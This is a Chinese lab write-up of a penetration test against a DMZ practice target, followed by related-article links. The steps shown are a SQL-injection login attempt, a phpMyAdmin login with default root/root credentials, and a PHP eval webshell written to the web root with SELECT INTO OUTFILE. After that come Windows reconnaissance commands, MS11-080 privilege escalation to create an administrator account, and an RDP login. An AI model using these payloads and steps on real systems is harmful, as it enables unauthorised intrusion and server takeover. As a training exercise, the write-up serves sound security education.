DMZ靶场渗透
0x00 目标站点www.test.ichunqiu
0x01 尝试登陆系统
-尝试弱密码登陆
结果:forbidden!!!
-尝试万能账号密码登陆
1‘ or 1=1--+ 和 1‘ or 1=1--+
结果:forbidden!!!
从登陆入口得不到其他更多的有效信息,所以从其他地方找突破口
0x02 使用御剑后台扫描工具对站点进行扫面
-开始扫描
-扫描得到一条目录信息:http://www.test.ichunqiu/phpmyadmin/
-打开扫描出来的链接,发现是phpmyadmin数据库管理程序
0x03 新的突破口:phpmyadmin
-得到phpmyadmin的登陆入口,当然就是想办法登陆进phpmyadmin系统
-尝试使用默认账号密码root/root进行登陆
-成功登陆进系统
-既然登陆进了phpmyadmin数据库的web管理页面,那也就相当于可以任意的查看整个数据库的内容,所以,尝试在数据库中去找到刚才想要登陆的系统的账号密码
-结果发现:当前web应用程序使用的数据库是个空数据库
0x04 利用sql语句写入webshell
-既然从数据库里面找不到登陆进后台管理页面的账号密码,所以只能从phpmyadmin提供的功能入手
-执行sql语句:select @@basedir 查询当前数据库所在的目录
-得到目录在:c:/phpstudy/mysql
-根据得到的数据库所在路径可以猜测,整个网站所在的根目录的路径是:C:/phpstudy/www
-既然猜测到了网站的根目录,那么尝试利用sql语句往网站根目录下写入一句话的webshell
-构造的sql语句: select “<?php eval($_POST[‘pass’])?>” into outfile “c:\\phpstudy\\www\\shell.php”
-成功写入webshell
0x05 使用菜刀连接webshell
-成功连接上:getshell
0x06 提权之前的信息收集
--获取主机名:
-hosname
--获取所属域信息:
-systeminfo
--获取系统补丁情况
-wmic qfe list 获取失败,没有权限,但是通过前面的system也能大致了解系统补丁安装情况
--获取本地用户组:
-net localgroup
--获取本地用户
-net user
--获取本地管理员信息:
-net localgroup administrators
0x07 利用exp:ms11080 获取系统管理员权限
根据前面对系统信息的收集和判断,在当前系统利用ms11080.exe来提升系统权限,使我们获得一个管理员权限的账户
-将ms11080上传至服务器的一个可读写的目录
-执行ms11080.exe(这个exp是一个不支持自定义命令参数的)
-成功执行exp,创建了一个具有administrator权限的90sec的管理员账户
0x08 利用新建的管理员账户90sec通过3389端口远程登陆进目标系统
-打开mstsc程序
-连接目标主机
-登陆目标主机
-成功通过远程桌面连接目标系统
DMZ靶场渗透的更多相关文章
- VulnHub靶场渗透之:Gigachad
环境搭建 VulnHub是一个丰富的实战靶场集合,里面有许多有趣的实战靶机. 本次靶机介绍: http://www.vulnhub.com/entry/gigachad-1,657/ 下载靶机ova文 ...
- 靶场渗透CH4INRULZ_v1.0.1
最新文章见我个人博客:点此 靶机环境下载地址:[下载] ova下载下来后直接导入virtualbox即可(https://www.vulnhub.com/entry/ch4inrulz-101,247 ...
- Vulnhub靶场渗透练习(三) bulldog
拿到靶场后先对ip进行扫描 获取ip 和端口 针对项目路径爆破 获取两个有用文件 http://192.168.18.144/dev/ dev,admin 更具dev 发现他们用到框架和语言 找到一 ...
- Vulnhub靶场渗透练习(二) Billu_b0x
运行虚拟机直接上nmap扫描 获取靶场ip nmap 192.168.18.* 开放端口 TCP 22 SSH OpenSSH 5.9p1 TCP 80 HTTP Apache httpd 2.2.2 ...
- Vulnhub靶场渗透练习(一) Breach1.0
打开靶场 固定ip需要更改虚拟机为仅主机模式 192.168.110.140 打开网页http://192.168.110.140/index.html 查看源代码发现可以加密字符串 猜测base64 ...
- webug3.0靶场渗透基础Day_1
第一关: 最简单的get注入 单引号报错 http://192.168.129.136/pentest/test/sqli/sqltamp.php?gid=1' order by 5 --+ ...
- Vulnhub靶场渗透练习(五) Lazysysadmin
第一步扫描ip nmap 192.168.18.* 获取ip 192.168.18.147 扫描端口 root@kali:~# masscan - --rate= Starting massc ...
- Vulnhub靶场渗透练习(四) Acid
利用namp 先进行扫描获取ip nmap 192.168.18.* 获取ip 没发现80端口 主机存活 猜测可以是个2000以后的端口 nmap -p1-65533 192.168.18.14 ...
- webug3.0靶场渗透基础Day_2(完)
第八关: 管理员每天晚上十点上线 这题我没看懂什么意思,网上搜索到就是用bp生成一个poc让管理员点击,最简单的CSRF,这里就不多讲了,网上的教程很多. 第九关: 能不能从我到百度那边去? 构造下面 ...
随机推荐
- Redis 在Golang中使用遇到的坑
1.从lua脚本传回到go那边的数字是string类型 2.hincrby 返回当前值的计算结果(即存放到redis中的值) 3.hset 一个不存在的key,返回什么呢?即设置失败返回什么错误?(会 ...
- 在 Windows Server Container 中运行 Azure Storage Emulator(二):使用自定义的 SQL Server Instance
上一节,我们解决了 Azure Storage Emulator 自定义监听地址的问题,这远远不够,因为在我们 DEV/QA 环境有各自的 SQL Server Instance,我们需要将 ASE ...
- 添加PHP扩展模块
php安装好后,可能在初次安装时,会有些模块会有遗漏,但是我们又不想重新编译php,因为耗时是比较长的.我们可不可以在不重新编译安装php的情况下,来为php单独添加某一个模块呢?查找资料,发现还是有 ...
- 月报 提取/保存 到OneDrive. 并发送反馈邮件
- MVC中使用EF的技巧集(二)——分部验证
1.从数据库生成模型后,再次更新模型时,之前设置的验证规则会丢失. 解决方法:在Models文件夹中新建一个空白类,把它命名为shujuyanzh.cs(类名可以自定),然后把Models中自动生成的 ...
- 解决Android sdk manager无法访问google服务器的问题
开发Android应用,使用最广泛的开发工具应该就是ADT了,但是ADT默认只带了Android 4.3(API 18),如果需要安装其他版本的SDK,就需要启动Android SDK Manager ...
- centos6.4 minimal 安装kvm
操作系统是网易源下载的centos 64位的minimal安装包,很多工具都没有,像gcc make wget which where 等统统没有,好在有yum 这里为了简单起见直接用yum安装kvm ...
- SQLAlchemy总结
SQL相关操作 创建一个test库 create database test; 授权一个用户 grant all privileges on *.* to 'yangjian'@'%' identif ...
- Python运算符和数据类型
一.Python的逻辑运算符 1.数字运算符: 运算符 描述 例子 + 加 - 两个对象相加 a + b 输出结果 30 - 减 - 得到负数或是一个数减去另一个数 a - b 输出结果 -10 * ...
- 【[AHOI2008]逆序对】
被锤爆了 被这个题搞得自闭了一上午,觉得自己没什么前途了 我又没有看出来这个题的一个非常重要的性质 我们填进去的数一定是单调不降的 首先如果填进去的数并不是单调不降的,那么填进去本身就会产生一些逆序对 ...
























